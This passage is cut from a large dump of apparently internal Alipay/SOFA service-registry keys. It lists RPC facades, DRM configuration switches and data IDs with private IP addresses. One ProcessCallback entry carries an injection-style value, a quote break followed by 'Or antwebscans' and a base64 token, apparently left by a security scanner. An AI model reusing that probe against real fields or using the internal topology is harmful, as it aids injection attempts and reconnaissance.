_ID#@#SOFA","com.alipay.ap.bizprod.common.service.facade.api.aggregation.AggregateRegisterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.finnet.service.drm.ChannelFilterDRM.dbackT0DelaySwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.0.141#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.scheduler:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.instopen.service.facade.wshop.FortuneBasicFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.213#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.common.event.UniformEventMessageListener:1.0:fundBossAlarmEventMessageListener@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.service.facade.eco.EcoTinyAppInfoDomainFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstprod.common.service.facade.api.funddemand.FundDemandFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insusercenter.client.policydetail.extension.PolicyBizInfoFetcherComponent:1.0:inshealthcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityops.common.service.client.spi.SecOpsChangeCallbackService:1.0:asop@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.signExpireEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insopenprod.common.service.facade.api.InsInvoiceServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bkmobileappcommon.common.service.testgo.rest.ITestServiceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.dmpservice.common.service.facade.promotion.PromotionPageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.test.SimpleService-7#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zskynet:name=com.alipay.echox.drm.EchoxSpecialDrm.ambushSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finadvisorprod.common.service.facade.api.SceneConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finannafccore.common.service.facade.contract.api.ContractFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundtrade.common.service.facade.api.FundWorkDayFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.uriCheckEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.malgo.common.facade.struct.SystemParamsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeduct.common.service.facade.agreement.AuthorizationVerifyRZoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.103.136#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.vouchercore.service.facade.api.point.PointQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.meshynotify.common.service.integration.client.gotone.SendMailServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodswitch.common.service.facade.UnifiedSpecialProductService:1.0:insuranceprodpecialcheck@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepep.spi.service.MobilePEPService:1.0:finfocore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassistantcore.common.service.facade.nearend.api.NearEndDataSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alphad.common.service.facade.model.iteration.api.IModelIterationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.125.20#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openauth.common.service.facade.interfacefield.InterfaceFieldQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.antschedulerconsole.endpoint.openapi.TopologyOpenApi#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.benefitcore.common.service.facade.api.BenefitContentConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.common.service.facade.topic.TopicManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesecurity.common.service.api.device.DeviceFacade:1.0:mobilesecurity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fctask.FcTaskSolutionMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.common.service.community.CommunityReplyUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.108.62#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.certifymng.revolmng.service.facade.PubConfigManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmDebugManager.debugLogOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.client.SystemAppInvokeService:1.0:itemcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.client.qaZQueue5#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:promobench@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:antacl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.fop.api.mng.CollageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.56.67#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zappinfo:name=com.alipay.echox.drm.EchoxDataGatherDrm.echoxGatherConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insptmarket.facade.channel.api.ChannelGuaranteeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.scheduler:name=com.alipay.scheduler.island.IslandSignal.inIsolation,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pointcore.common.mpoint.facade.MpointStatisticsService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insopenprod.core.service.GoToneService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.146.161#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zcbsalescenter.common.service.integration.tair.TairClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxcore.common.service.facade.api.agengine.AgEngineRunLogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iotcore.spi.RpcSpi:1.0:iottestpower@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.consumeprod.common.service.facade.UserConsumeInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.finriskeventseek.facade.LeviathanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.gfcenter.common.service.facade.UserInvoiceInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","NS_Sub_Servers_TP_F_LIFEMOCK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:AssetPoolActivate_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:rest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.workflow.WorkflowChannelFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.facade.api.wealth.WealthActivityQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.mrch.common.service.api.VerifyInfoOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rcservicebus.client.BusClientInvoker:1.0:rconehub@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:demotianhe@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.zcbsalescenter.common.service.integration.finfundtrade.FundTradeOrderQueryFacadeClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.spannermng.common.service.facade.ZoneTrafficSwitchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_CONSUME#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.ck:name=com.alipay.zdal.config.groupCluster.aqcPaas_ds.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkcreditmodel.common.service.facade.ZproxyCreditModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.chargeTBaseCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.52.84.151#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:gmcore-shop-migrate@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qualityprod.service.riskctrl.spi.ChangeCtrlCallbackService:1.0:zparamcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revtrans:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.successParkIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.jiuzhou.facade.CategoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycap.common.service.facade.worktask.facade.WirelessWorkTaskService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:�\" Or antwebscansYW50=ODAxMDIwNTMtdW5pcXVlSWQtMTEwMDAyMDEw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.89#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insiop.biz.module.manager.InsIopModuleTmplManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.xview.core.common.drm.CacheConsistSwitch.rateOfRead,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.poscore:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.shadowKeySwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.socialportal.web.task.rpc.facade.activity.CommonDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebillcenter.common.service.facade.mng.EbillDataConfFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.core.config.drm.PttransSnapshotMsgDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmFopConfig.contentLegalCheckSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:govdataprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:bkibdeposit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.vega-integration-kepler:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneColor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_10.15.235.48#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ipsponsorprod.biz.shared.service.RaceLampService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clivemng.common.service.facade.api.level.LevelQueryService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.fluxconf.service.facade.ctrl.DataClientFetchService:1.0:fluxconf@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobileha.facade.replayssearch.ReplaysSearchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:infosec@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hainaprod.common.service.facade.api.mini.op.CroBundleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.risk.ChangeRiskLevelQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@giftprod#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSasControlDrmResource.executeOverTimeRange,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finloancenter.common.service.facade.FinancingProductSerialManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.plugin.PluginServiceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturemng.portable.sql.facade.FeatureJobFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alphad.common.service.facade.kgnlp.report.api.IKgNLPReportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.recruitcore.facade.api.plan.PlanAdminQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:nearbyshopbase@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.antcloud.infrastructure.facade.environment.EnvironmentExplorer:1.0:LISTENER@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.amct.facade.PackageInfotFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmerchant.service.facade.HbProductMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.zdal.ldc.tair.finfocoreTairCache_dest.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insiop.common.service.facade.blackmirror.BlackMirrorMarketingGraphMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.facade.api.SecuDefValFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cashier:name=com.alipay.cashier.common.service.integration.drm.resource.AntEventContextResource.globalFlag,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbmmweb.facade.BffService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.cif.drm.PasswordRevokeSwitch.operationPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.certify.service.facade.RealNameManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mrchportalcore.common.service.merchant.facade.api.ShopInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.zpaas.facade.api.OrderOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.AckCodeService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opssla.common.service.facade.DrmManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbadvert.common.service.integration.authcenter.AuthenticationServiceClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.dataphin.tenant.client.biz.service.PreferenceService:1.0:dpsecurity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.graywall.common.service.facade.api.RegisterService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.basic.articlehot.facade.BasicArticleHotQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revol.core.service.facade.ScriptChecker:1.0:semanticDevTenant@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.4#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finorm.core.service.guardian.ImmuneModelCoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestprod.common.service.facade.api.TestMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.mwalletmng.mmng.drm.FuCardDrm.env,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.bigfish:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalGrayAccountRange,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_closeAccountSettleInterestCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bugscan.service.ApproveService:1.0:approveService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.membertask.MemberTaskConfigQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSwitchControlDRMResource.winFundQueryInitOrder,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mwealthprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.timeout.common.service.facade.api.TimeoutExecutor:1.0:personalprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.mart.facade.AmImgTemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.128.72#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","HEALTHY_V2@fincardbff#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.scheduler.common.service.facade.update.TaskManageFacade:1.0:ZAXHBXCN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.tradeapcore.common.service.integration.drm.resource.DrmForCommonManageResource.platformForSkipUserCheck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.88.232.9#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kabaoprod.service.facade.merchant.MerchantPassCodeVerfiyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchmobile.common.service.facade.mmcard.MrchMemberCardTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.arater.common.service.triple.RateDataSync:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custrelation.service.facade.entity.EntityRelationOperateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.220.78#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.riskmng:name=com.alipay.cif.client.drm.AntPassportSwitcher.expireTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.routeclient.interfacename:insxhbbff#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Pub_Servers_TP_M_SHOP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.antfeaturelib.core.dal.service.DVNodeMetaDALService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.kmi.common.service.facade.TrustBaseFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.mashup:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finfocore:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.checkMvelBlackKeyWords,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.example.server.facade.MobService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.audit.biz.manager.config.StrategyManagerControlResource.domainsOfRefreshDimensionMatrixStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.socialportal.web.ps.rpc.facade.UserDisturbingFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.manager.ArticleTransferService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.finassetprod.FinAssetProdService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlementprod.common.service.facade.api.CommissionBillInvoiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:basement-overseatwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.DynamicConfigTBaseCache.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.custcpt.facade.IdentityRegisterService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insttrade.common.service.facade.api.InstAssetFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bksmarttrade.common.service.facade.ReverseRepoStatService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdalproxyquery:name=com.alipay.anthubble.proxy.sla.AntHubbleSla.usersSlaRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openeval.common.service.facade.activityha.ActivityhaServiceSpi:1.0:frontConfirmService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.MedicalContactService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.32.29#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.stocktrade.facade.metrics.MetricsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpdcore:name=com.alipay.fc.prodquery.core.service.drm.PdCoreCacheRefreshDRM.cacheStrategyCommand,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.riskmngPunishcenterTairCache.serializationType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mfinquotationprod.common.service.facade.api.QuoteCommonQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappconfig.common.service.facade.api.RuleDefManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.adadvice.facade.query.InfluenceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataViewCalcService:1.0:insurance_antfeaturecloud@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icif.service.facade.api.AccessTokenQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbbocenter.common.service.facade.order.pay.RefundNotifyListenerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsearch.common.service.facade.api.buffett.BuffettOneboxFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkdatainspect.facade.InspectService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.127.16#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.NewCtuDataDrm.newCtuDatas,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_S_1214#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.bis.common.service.facade.idpapers.IdpapersSideCutFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_192.168.8.241#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.batchpay.service.batch.bwfb.api.bg.PaymentInfoBGFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:uniqueId123@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandConditionStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.contentlib.common.service.facade.understand.ContentFeatureFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:vouchercore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exchangecore.common.service.facade.api.InstExchangeResultFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.96.59#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openmq.common.service.facade.MessageCallbackService:1.0:antinvoice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.sofa.platform.xts.bacs.drm.ActionAppInfo.appDbTableNum,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.iliquidity.core.service.transfer.engine.TransferTaskEngine:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cap.common.openapi.internal.OpenApiService:1.0:antcloud_promox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","zimtmsvcprod@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.linglongsdk.server.facade.SceneQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.customscenter.common.service.facade.declare.api.CustomsDeclareService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSprControlDrmResource.updateTaskRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.darwin.common.service.facade.api.DimensionTableMgrFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csrobotmng.bot.facade.test.BotDeployTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.service.facade.service.InspectFailureManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.common.service.integration.drm.loadtest.LoadTestConfigDrm.queryUserLevelConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:workflow@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@mrchcommercelab#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.sofa.rpc.elastic.ElasticService:1.0:alipaydwportal@DEFAULT#@#D